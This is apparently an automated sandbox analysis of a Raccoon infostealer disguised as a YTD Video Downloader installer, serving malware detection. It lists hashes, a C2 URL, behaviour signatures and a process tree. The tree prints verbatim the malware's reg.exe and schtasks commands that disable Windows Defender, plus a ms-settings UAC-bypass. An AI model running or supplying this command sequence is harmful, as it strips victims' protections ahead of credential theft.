General
Target

36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.exe

Filesize

12MB

Completed

12-05-2022 00:10

Task

behavioral1

Score
10/10
MD5

d6c42156c6c44da64fe062891eb5aa17

SHA1

7fe05a8589a45d70d8c19f39b1d7c53390648e83

SHA256

36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488

SHA256

bb2002558c38c9f87a01c082f0c4d9d665400d8e834b4f34eaa200dcfe008670005d702d647698723de1db0cd3f517158b2b0f6b55a451dd62a64eb1915b038b

Malware Config

Extracted

Family

raccoon

rc4.plain

Extracted

Family

raccoon

Botnet

c763e433ef51ff4b6c545800e4ba3b3b1a2ea077

Attributes
url4cnc
https://telete.in/jbitchsucks
rc4.plain
rc4.plain
Signatures 15

Filter: none

Defense Evasion
Discovery
Persistence
  • Modifies Windows Defender Real-time Protection settings

    TTPs

    Modify RegistryModify Existing ServiceDisabling Security Tools
  • Modifies security service
    reg.exe

    Tags

    TTPs

    Modify RegistryModify Existing Service

    Reported IOCs

    descriptioniocprocess
    Set value (int)\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"reg.exe
  • Raccoon

    Description

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload

    Reported IOCs

    resourceyara_rule
    behavioral1/memory/1572-179-0x0000000000130000-0x00000000001C3000-memory.dmpfamily_raccoon
    behavioral1/memory/1572-181-0x0000000000130000-0x00000000001C3000-memory.dmpfamily_raccoon
    behavioral1/memory/1572-184-0x000000000043FCC3-mapping.dmpfamily_raccoon
    behavioral1/memory/1572-186-0x0000000000130000-0x00000000001C3000-memory.dmpfamily_raccoon
    behavioral1/memory/1572-189-0x0000000000130000-0x00000000001C3000-memory.dmpfamily_raccoon
    behavioral1/memory/1572-193-0x0000000000130000-0x00000000001C3000-memory.dmpfamily_raccoon
  • Executes dropped EXE
    36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmpYTD.Video.Downloader.5.9.17.exeYTD.Video.Downloader.5.9.17.tmp7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe84613.exe84613.exe

    Reported IOCs

    pidprocess
    192836f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp
    940YTD.Video.Downloader.5.9.17.exe
    2004YTD.Video.Downloader.5.9.17.tmp
    17087z.exe
    16767z.exe
    6247z.exe
    8007z.exe
    19127z.exe
    18087z.exe
    16047z.exe
    2887z.exe
    56484613.exe
    157284613.exe
  • Loads dropped DLL
    36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.exe36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmpYTD.Video.Downloader.5.9.17.exeYTD.Video.Downloader.5.9.17.tmpcmd.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe84613.exe

    Reported IOCs

    pidprocess
    60036f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.exe
    192836f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp
    192836f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp
    940YTD.Video.Downloader.5.9.17.exe
    2004YTD.Video.Downloader.5.9.17.tmp
    2004YTD.Video.Downloader.5.9.17.tmp
    2004YTD.Video.Downloader.5.9.17.tmp
    2004YTD.Video.Downloader.5.9.17.tmp
    2004YTD.Video.Downloader.5.9.17.tmp
    572cmd.exe
    17087z.exe
    16767z.exe
    6247z.exe
    8007z.exe
    19127z.exe
    18087z.exe
    16047z.exe
    2887z.exe
    572cmd.exe
    56484613.exe
  • Suspicious use of SetThreadContext
    84613.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 564 set thread context of 157256484613.exe84613.exe
  • Drops file in Program Files directory
    36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Program Files (x86)\YTD.Video.Downloader.5.9.17.exe36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp
    File createdC:\Program Files (x86)\is-CCHO3.tmp36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Delays execution with timeout.exe
    timeout.exe

    Tags

    Reported IOCs

    pidprocess
    2020timeout.exe
  • Modifies registry class
    reg.exereg.exe

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings\shell\openreg.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\windows\\SysWow64\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"reg.exe
    Key created\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings\shell\open\commandreg.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute = " "reg.exe
    Key created\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings\shell\open\commandreg.exe
    Key created\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settingsreg.exe
    Key created\REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\ms-settings\shellreg.exe
  • Suspicious behavior: EnumeratesProcesses
    36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmpYTD.Video.Downloader.5.9.17.tmp84613.exe

    Reported IOCs

    pidprocess
    192836f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp
    192836f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp
    2004YTD.Video.Downloader.5.9.17.tmp
    56484613.exe
  • Suspicious use of AdjustPrivilegeToken
    7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe84613.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeRestorePrivilege17087z.exe
    Token: 3517087z.exe
    Token: SeSecurityPrivilege17087z.exe
    Token: SeSecurityPrivilege17087z.exe
    Token: SeRestorePrivilege16767z.exe
    Token: 3516767z.exe
    Token: SeSecurityPrivilege16767z.exe
    Token: SeSecurityPrivilege16767z.exe
    Token: SeRestorePrivilege6247z.exe
    Token: 356247z.exe
    Token: SeSecurityPrivilege6247z.exe
    Token: SeSecurityPrivilege6247z.exe
    Token: SeRestorePrivilege8007z.exe
    Token: 358007z.exe
    Token: SeSecurityPrivilege8007z.exe
    Token: SeSecurityPrivilege8007z.exe
    Token: SeRestorePrivilege19127z.exe
    Token: 3519127z.exe
    Token: SeSecurityPrivilege19127z.exe
    Token: SeSecurityPrivilege19127z.exe
    Token: SeRestorePrivilege18087z.exe
    Token: 3518087z.exe
    Token: SeSecurityPrivilege18087z.exe
    Token: SeSecurityPrivilege18087z.exe
    Token: SeRestorePrivilege16047z.exe
    Token: 3516047z.exe
    Token: SeSecurityPrivilege16047z.exe
    Token: SeSecurityPrivilege16047z.exe
    Token: SeRestorePrivilege2887z.exe
    Token: 352887z.exe
    Token: SeSecurityPrivilege2887z.exe
    Token: SeSecurityPrivilege2887z.exe
    Token: SeDebugPrivilege56484613.exe
  • Suspicious use of FindShellTrayWindow
    36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp

    Reported IOCs

    pidprocess
    192836f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp
  • Suspicious use of WriteProcessMemory
    36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.exe36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmpYTD.Video.Downloader.5.9.17.exeWScript.execmd.execmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 600 wrote to memory of 192860036f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.exe36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp
    PID 600 wrote to memory of 192860036f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.exe36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp
    PID 600 wrote to memory of 192860036f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.exe36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp
    PID 600 wrote to memory of 192860036f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.exe36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp
    PID 600 wrote to memory of 192860036f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.exe36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp
    PID 600 wrote to memory of 192860036f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.exe36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp
    PID 600 wrote to memory of 192860036f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.exe36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp
    PID 1928 wrote to memory of 940192836f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmpYTD.Video.Downloader.5.9.17.exe
    PID 1928 wrote to memory of 940192836f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmpYTD.Video.Downloader.5.9.17.exe
    PID 1928 wrote to memory of 940192836f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmpYTD.Video.Downloader.5.9.17.exe
    PID 1928 wrote to memory of 940192836f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmpYTD.Video.Downloader.5.9.17.exe
    PID 940 wrote to memory of 2004940YTD.Video.Downloader.5.9.17.exeYTD.Video.Downloader.5.9.17.tmp
    PID 940 wrote to memory of 2004940YTD.Video.Downloader.5.9.17.exeYTD.Video.Downloader.5.9.17.tmp
    PID 940 wrote to memory of 2004940YTD.Video.Downloader.5.9.17.exeYTD.Video.Downloader.5.9.17.tmp
    PID 940 wrote to memory of 2004940YTD.Video.Downloader.5.9.17.exeYTD.Video.Downloader.5.9.17.tmp
    PID 940 wrote to memory of 2004940YTD.Video.Downloader.5.9.17.exeYTD.Video.Downloader.5.9.17.tmp
    PID 940 wrote to memory of 2004940YTD.Video.Downloader.5.9.17.exeYTD.Video.Downloader.5.9.17.tmp
    PID 940 wrote to memory of 2004940YTD.Video.Downloader.5.9.17.exeYTD.Video.Downloader.5.9.17.tmp
    PID 1928 wrote to memory of 1716192836f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmpWScript.exe
    PID 1928 wrote to memory of 1716192836f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmpWScript.exe
    PID 1928 wrote to memory of 1716192836f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmpWScript.exe
    PID 1928 wrote to memory of 1716192836f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmpWScript.exe
    PID 1716 wrote to memory of 18681716WScript.execmd.exe
    PID 1716 wrote to memory of 18681716WScript.execmd.exe
    PID 1716 wrote to memory of 18681716WScript.execmd.exe
    PID 1716 wrote to memory of 18681716WScript.execmd.exe
    PID 1716 wrote to memory of 4281716WScript.execmd.exe
    PID 1716 wrote to memory of 4281716WScript.execmd.exe
    PID 1716 wrote to memory of 4281716WScript.execmd.exe
    PID 1716 wrote to memory of 4281716WScript.execmd.exe
    PID 428 wrote to memory of 840428cmd.exereg.exe
    PID 428 wrote to memory of 840428cmd.exereg.exe
    PID 428 wrote to memory of 840428cmd.exereg.exe
    PID 428 wrote to memory of 840428cmd.exereg.exe
    PID 1868 wrote to memory of 10961868cmd.exereg.exe
    PID 1868 wrote to memory of 10961868cmd.exereg.exe
    PID 1868 wrote to memory of 10961868cmd.exereg.exe
    PID 1868 wrote to memory of 10961868cmd.exereg.exe
    PID 1868 wrote to memory of 1041868cmd.exereg.exe
    PID 1868 wrote to memory of 1041868cmd.exereg.exe
    PID 1868 wrote to memory of 1041868cmd.exereg.exe
    PID 1868 wrote to memory of 1041868cmd.exereg.exe
    PID 428 wrote to memory of 816428cmd.exereg.exe
    PID 428 wrote to memory of 816428cmd.exereg.exe
    PID 428 wrote to memory of 816428cmd.exereg.exe
    PID 428 wrote to memory of 816428cmd.exereg.exe
    PID 1868 wrote to memory of 16401868cmd.exereg.exe
    PID 1868 wrote to memory of 16401868cmd.exereg.exe
    PID 1868 wrote to memory of 16401868cmd.exereg.exe
    PID 1868 wrote to memory of 16401868cmd.exereg.exe
    PID 1868 wrote to memory of 11321868cmd.exereg.exe
    PID 1868 wrote to memory of 11321868cmd.exereg.exe
    PID 1868 wrote to memory of 11321868cmd.exereg.exe
    PID 1868 wrote to memory of 11321868cmd.exereg.exe
    PID 1868 wrote to memory of 19121868cmd.exereg.exe
    PID 1868 wrote to memory of 19121868cmd.exereg.exe
    PID 1868 wrote to memory of 19121868cmd.exereg.exe
    PID 1868 wrote to memory of 19121868cmd.exereg.exe
    PID 1868 wrote to memory of 13041868cmd.exereg.exe
    PID 1868 wrote to memory of 13041868cmd.exereg.exe
    PID 1868 wrote to memory of 13041868cmd.exereg.exe
    PID 1868 wrote to memory of 13041868cmd.exereg.exe
    PID 1868 wrote to memory of 19081868cmd.exereg.exe
    PID 1868 wrote to memory of 19081868cmd.exereg.exe
Processes 55
  • C:\Users\Admin\AppData\Local\Temp\36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.exe
    "C:\Users\Admin\AppData\Local\Temp\36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.exe"
    Loads dropped DLL
    Suspicious use of WriteProcessMemory
    PID:600
    • C:\Users\Admin\AppData\Local\Temp\is-RU3S6.tmp\36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-RU3S6.tmp\36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.tmp" /SL5="$60120,12874840,731648,C:\Users\Admin\AppData\Local\Temp\36f9c1b4537ea7764f2de77f4264676eb213ad2a56b8e4cc4ec65488c3234488.exe"
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:1928
      • C:\Program Files (x86)\YTD.Video.Downloader.5.9.17.exe
        "C:\Program Files (x86)\YTD.Video.Downloader.5.9.17.exe"
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        PID:940
        • C:\Users\Admin\AppData\Local\Temp\is-DHD6L.tmp\YTD.Video.Downloader.5.9.17.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-DHD6L.tmp\YTD.Video.Downloader.5.9.17.tmp" /SL5="$101AE,8824992,64512,C:\Program Files (x86)\YTD.Video.Downloader.5.9.17.exe"
          Executes dropped EXE
          Loads dropped DLL
          Suspicious behavior: EnumeratesProcesses
          PID:2004
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\skIKa\MMF.vbs"
        Suspicious use of WriteProcessMemory
        PID:1716
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\ProgramData\skIKa\DisableOAVProtection.bat" "
          Suspicious use of WriteProcessMemory
          PID:1868
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            PID:1096
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
            PID:104
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
            PID:1640
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
            PID:1132
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
            PID:1912
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
            PID:1304
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
            PID:1908
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
            PID:1604
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
            PID:1892
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
            PID:1680
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
            PID:1728
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
            PID:1336
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
            PID:1944
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
            PID:920
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
            PID:1180
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
            PID:680
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
            PID:864
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
            PID:756
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
            PID:1884
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
            PID:1500
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
            PID:1592
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
            PID:1596
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
            PID:1688
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
            PID:944
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
            PID:1300
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
            PID:1980
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
            PID:2028
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
            PID:1948
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
            PID:980
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
            PID:600
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
            Modifies security service
            PID:1376
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
            PID:1748
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\ProgramData\skIKa\DisableUserAccountControl.bat" "
          Suspicious use of WriteProcessMemory
          PID:428
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
            Modifies registry class
            PID:840
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
            Modifies registry class
            PID:816
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\ProgramData\skIKa\main.bat" "
          Loads dropped DLL
          PID:572
          • C:\Windows\SysWOW64\mode.com
            mode 65,10
            PID:692
          • C:\ProgramData\skIKa\7z.exe
            7z.exe e file.zip -p___________22830pwd1083pwd601___________ -oextracted
            Executes dropped EXE
            Loads dropped DLL
            Suspicious use of AdjustPrivilegeToken
            PID:1708
          • C:\ProgramData\skIKa\7z.exe
            7z.exe e extracted/file_7.zip -oextracted
            Executes dropped EXE
            Loads dropped DLL
            Suspicious use of AdjustPrivilegeToken
            PID:1676
          • C:\ProgramData\skIKa\7z.exe
            7z.exe e extracted/file_6.zip -oextracted
            Executes dropped EXE
            Loads dropped DLL
            Suspicious use of AdjustPrivilegeToken
            PID:624
          • C:\ProgramData\skIKa\7z.exe
            7z.exe e extracted/file_5.zip -oextracted
            Executes dropped EXE
            Loads dropped DLL
            Suspicious use of AdjustPrivilegeToken
            PID:800
          • C:\ProgramData\skIKa\7z.exe
            7z.exe e extracted/file_4.zip -oextracted
            Executes dropped EXE
            Loads dropped DLL
            Suspicious use of AdjustPrivilegeToken
            PID:1912
          • C:\ProgramData\skIKa\7z.exe
            7z.exe e extracted/file_3.zip -oextracted
            Executes dropped EXE
            Loads dropped DLL
            Suspicious use of AdjustPrivilegeToken
            PID:1808
          • C:\ProgramData\skIKa\7z.exe
            7z.exe e extracted/file_2.zip -oextracted
            Executes dropped EXE
            Loads dropped DLL
            Suspicious use of AdjustPrivilegeToken
            PID:1604
          • C:\ProgramData\skIKa\7z.exe
            7z.exe e extracted/file_1.zip -oextracted
            Executes dropped EXE
            Loads dropped DLL
            Suspicious use of AdjustPrivilegeToken
            PID:288
          • C:\ProgramData\skIKa\84613.exe
            "84613.exe"
            Executes dropped EXE
            Loads dropped DLL
            Suspicious use of SetThreadContext
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of AdjustPrivilegeToken
            PID:564
            • C:\ProgramData\skIKa\84613.exe
              "84613.exe"
              Executes dropped EXE
              PID:1572
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\ProgramData\skIKa\DiskRemoval.bat" "
          PID:1160
          • C:\Windows\SysWOW64\timeout.exe
            timeout /T 60 /NOBREAK
            Delays execution with timeout.exe
            PID:2020
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Privilege Escalation
                    Replay Monitor
                    00:00 00:00
                    Downloads
                    • C:\Program Files (x86)\YTD.Video.Downloader.5.9.17.exe

                      MD5

                      8c9c936650d3d784379ac48072e97880

                      SHA1

                      6861bb6a4e72d8559c0aecf03c83a5051bde2827

                      SHA256

                      c6809a339ffd1ad0f72348719ad601947d5a15cc1ad1f1016f28cf2843528222

                      SHA512

                      77a6be698f578e059f5399cc267fe9af87b583a6402fab80afa3dd24e3cfd8eef4d0fdc34cee4d452d952f1bf07af066a286fe09074b9cd87934551643cda8d1

                    • C:\Program Files (x86)\YTD.Video.Downloader.5.9.17.exe

                      MD5

                      8c9c936650d3d784379ac48072e97880

                      SHA1

                      6861bb6a4e72d8559c0aecf03c83a5051bde2827

                      SHA256

                      c6809a339ffd1ad0f72348719ad601947d5a15cc1ad1f1016f28cf2843528222

                      SHA512

                      77a6be698f578e059f5399cc267fe9af87b583a6402fab80afa3dd24e3cfd8eef4d0fdc34cee4d452d952f1bf07af066a286fe09074b9cd87934551643cda8d1

                    • C:\ProgramData\skIKa\7z.dll

                      MD5

                      72491c7b87a7c2dd350b727444f13bb4

                      SHA1

                      1e9338d56db7ded386878eab7bb44b8934ab1bc7

                      SHA256

                      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                      SHA512

                      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                    • C:\ProgramData\skIKa\7z.exe

                      MD5

                      619f7135621b50fd1900ff24aade1524

                      SHA1

                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                      SHA256

                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                      SHA512

                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                    • C:\ProgramData\skIKa\7z.exe

                      MD5

                      619f7135621b50fd1900ff24aade1524

                      SHA1

                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                      SHA256

                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                      SHA512

                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                    • C:\ProgramData\skIKa\7z.exe

                      MD5

                      619f7135621b50fd1900ff24aade1524

                      SHA1

                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                      SHA256

                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                      SHA512

                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                    • C:\ProgramData\skIKa\7z.exe

                      MD5

                      619f7135621b50fd1900ff24aade1524

                      SHA1

                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                      SHA256

                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                      SHA512

                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                    • C:\ProgramData\skIKa\7z.exe

                      MD5

                      619f7135621b50fd1900ff24aade1524

                      SHA1

                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                      SHA256

                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                      SHA512

                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                    • C:\ProgramData\skIKa\7z.exe

                      MD5

                      619f7135621b50fd1900ff24aade1524

                      SHA1

                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                      SHA256

                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                      SHA512

                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                    • C:\ProgramData\skIKa\7z.exe

                      MD5

                      619f7135621b50fd1900ff24aade1524

                      SHA1

                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                      SHA256

                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                      SHA512

